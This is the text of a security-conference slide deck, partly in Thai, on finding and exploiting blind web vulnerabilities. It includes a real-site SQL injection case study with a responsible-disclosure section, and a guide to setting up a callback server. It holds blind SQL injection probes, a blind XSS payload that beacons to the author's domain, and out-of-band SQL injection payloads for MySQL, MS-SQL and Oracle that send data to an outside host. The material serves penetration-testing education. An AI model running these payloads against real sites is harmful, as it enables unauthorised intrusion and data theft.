Exploiting Blind VulnerabilitiesA tale of webapp security wizard
Pichaya MorimotoIT Security Consultant, SEC Consult (Thailand) Co.,Ltd.
GIAC Web Application Penetration Tester Certified
Pichaya MorimotoIT Security ConsultantSEC Consult (Thailand) Co., Ltd.
whoami
สอนแฮกเว็บแบบแมวๆ
https://www.facebook.com/longhackzhttps://www.youtube.com/user/pich4ya
Hacking Competition (Pwnladin Team)
Security Advisories
Security Advisories
https://www.limesurvey.org/blog/76-limesurvey-news/security-advisories/1836-limesurvey-security-advisory-10-2015
Public Exploits
SEC Consult - Who we are
★ Advisor for information security
★ Expert for the implementation of security processes and policies (ISO 27001, BS 25999, GSHB)
★ Leading company for technical security audits
★ Specialist for web application security according to ONR 17700
★ Independent of product manufacturers
★ Our customers are public authorities, financial institutions and insurance companies in Central Europe
★ Sectoral orientation (defence, public, finance, industry)
SEC Consult - Who we are
entire company within certification scope
certified since 16.01.2008
ISO/IEC 27001 Certificate
SEC Consult Vulnerability Lab
European leading research lab for the identification of vulnerabilities and the analysis of new technologies, products and applications (security advisories)
Integral part of the education and the further training of the security experts at SEC Consult
Early information of our customers due to SEC Consult security alerts
Support of well-known manufacturers to enhance the security of their products
Companies and organisations SEC Consult has released security advisories for (excerpt). For details see: http://www.sec-consult.com/72.html
Contact SEC Consult
★ Vulnerabilities and Exploits★ Blind Vulnerabilities★ Exploitation Techniques★ Setup Environment★ Demo
Overview
Network
Application Level
OS
Application
Web App
www.facebook.com
System: Facebook (Simplified version)
Attack Surface
Web as an Attack Surface:- User Input
- HTTP Header- HTTP Body
- Control Flow- Abuse path of
web execution
Vulnerabilities
OWASP Top 10 for 2013:★ A1 Injection★ A2 Broken Authentication and Session Management★ A3 Cross-Site Scripting (XSS)★ A4 Insecure Direct Object References★ A5 Security Misconfiguration★ A6 Sensitive Data Exposure★ A7 Missing Function Level Access Control★ A8 Cross-Site Request Forgery (CSRF)★ A9 Using Components with Known Vulnerabilities★ A10 Unvalidated Redirects and Forwards
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SQL Injection
SQL Injection
SQL Injection
SELECT text, description FROM news WHERE description LIKE '%let's go%'
SELECT text, description FROM news WHERE description LIKE '%let's go%'
SQL Injection: UNION
Non-blind Vulnerability
YOU ARE NOT BLIND !สามารถนําขอมูลออกมาไดโดยตรงบนหนาเว็บ
sqlite_master.sql
SQL Injection: UNION
SQL Injection: UNION
PWNED
แลวถา...
ขอมูลที่ SELECT ออกมาไมไดถูกนําไปแสดง หรือเปน SQL query แบบ..
- UPDATE- INSERT- DELETE- อื่น ๆ ที่ไมไดแสดงผลลัพธ
Introduction to BLIND Vulnerabilities
Case Study: TreeOfSavior.com
การแฮกเจาะระบบเขาไปในระบบใด ๆ ที่เจาของระบบไมอนุญาติ ใหเราทดสอบระบบ เปนสิ่งผิดกฏหมาย ทําแลวอาจติดคุกหรือโดนปรับ เปนคดีอาญายอมความไมได
Legal Warning: คําเตือน
April 26, 2016: ตอนเชา
April 26, 2016 : ตอนเที่ยงวัน...
April 26, 2016 : ตอนเที่ยงคืน...
April 27, 2016 : ตี 1
BLIND SQL Injection: Probe
aaaaa' or (1=1) or 'bbbbbb
BLIND SQL Injection: Probe
aaaaa' or (1=2) or 'bbbbbb
BLIND SQL Injection: Probe
aaaaa' order by contentz-- -
BLIND SQL Injection: Probe
aaaaa' order by content-- -
BLIND SQL Injection: Exploit
★ information_schema
★ mysql★ performance_schema★ sys★ test★ tos_wiki
★ treeofsavior
SQLMapEZ EZ Script Kiddy!
Responsible Disclosure 101
Responsible Disclosure 101
ชองโหวอะไรอีกที่โจมตีแบบ Blind ได?
Cross-Site Scripting (XSS)
โชวคาที่รับมาจาก user input บนหนา HTML
Cross-Site Scripting (XSS)
http://127.0.0.1:1234/hello.php?name=<script>alert("let do something evil")</script>
ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ
Blind XSS?
ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..
How to Find Generic Blind Vulns
Exploit Payload ที่มีการทํา outbound
connection
เครื่องที่ถูกโจมตี รันโคดจาก exploit เพื่อทําอะไร
บางอยางใหคนโจมตีรูวาการโจมตีนั้นไดผล
ผูโจมตีไดรับขอมูลบางอยาง เพื่อพิสูจนไดวา ชองโหวที่
exploit ไปสําเร็จ
1
2
3
ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !
Blind XSS
"><script>new Image().src="http://p7z.pw/xss1/?a=1337"</script>
ชองโหวที่มองไมเห็นไดดวยตา แตสัมผัสไดดวยใจ HTTP Request !
Blind XSS
IP คนโดน XSS IP เซิรฟเวอรรอรับผล
$ tail -n 1 /var/log/apache2/access.log[IP คนโดน XSS] - - [17/Jun/2016:18:38:30 -0400] "GET /xss1/?a=1337 HTTP/1.1" 404 492 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
ไมเห็นโดยตรง ก็ตองหาทางเห็นแบบออม ๆ ไปแทน..
How to Find Generic Blind Vulns
Exploit Payload ที่มีการทํา outbound
connection
เครื่องที่ถูกโจมตี รันโคดจาก exploit เพื่อทําอะไร
บางอยางใหคนโจมตีรูวาการโจมตีนั้นไดผล
ผูโจมตีไดรับขอมูลบางอยาง เพื่อพิสูจนไดวา ชองโหวที่
exploit ไปสําเร็จ
1
2
3
A.k.a. Out-of-band (OBB) technique
★ MySQLLOAD_FILE('\\\\sqli1.p7z.pw\\')INTO OUTFILE '\\\\sqli2.p7z.pw\\test.txt'
★ MS-SQLOPENROWSET('SQLOLEDB', 'sqli3.p7z.pw';'a';'b', 'SELECT 1')EXEC master..xp_dirtree '\\sqli4.p7z.pw\' --
★ Oracle UTL_HTTP.request('sqli5.p7z.pw/?a='||(SELECT user FROM DUAL)
Probe for Blind SQL Injection
ที่มา: https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
★ ICMP Ping Request - 3 กะโหลก★ HTTP Request - 4 กะโหลก★ NBNS Request - 1 กะโหลก★ FTP Login - 2 กะโหลก★ DNS Resolution - 5 กะโหลก
Outbound Traffic
★ ตองมี IP จริง เขาถึงไดจากอินเทอรเน็ต★ ควรจะเปนเครื่อง Linux สะดวกกวา Windows★ จด domain มาใชดวยจะดีมาก (ดูกันตอวาทําไม)★ ควรเปนเครื่องใน network ที่ไมโดน block port
หรือมีการใช proxyใด ๆ ที่แกไขขอมูลเขา-ออก
Setup Server for Testing
Setup VPS
1. Install apache22. Install bind9
Setup VPS
Setup Domain/DNS
ปแรก 200 บาท domain + whois
privacy แลว
ชื่อ domain เอาสั้น ๆ ที่สุดที่จะสั้นได
Setup Domain/DNS
Test DNS Resolution
Pros:★ เซิรฟเวอรทั่วไปมีโปรแกรม ping หางาย★ เร็วและงาย
Cons:★ บางเซิรฟเวอร block ปง!★ ชองโหวที่ไมใช Command Injection ใชไมได
#1 ICMP Ping Request
Pros:★ ...
Cons:★ บางเซิรฟเวอร block HTTP Outbound ไป untrusted IP !?
#2 HTTP Request
Pros:★ ไมมีเซิรฟเวอรที่ไหน block DNS
Cons:★ Setup ยุงยากเล็กนอยตอนเริ่ม
#3 DNS Resolution
DEMO
Find Blind Vuln with DNS Resolution
Thank you!
FB: สอนแฮกเว็บแบบแมว ๆhttps://fb.com/longhackz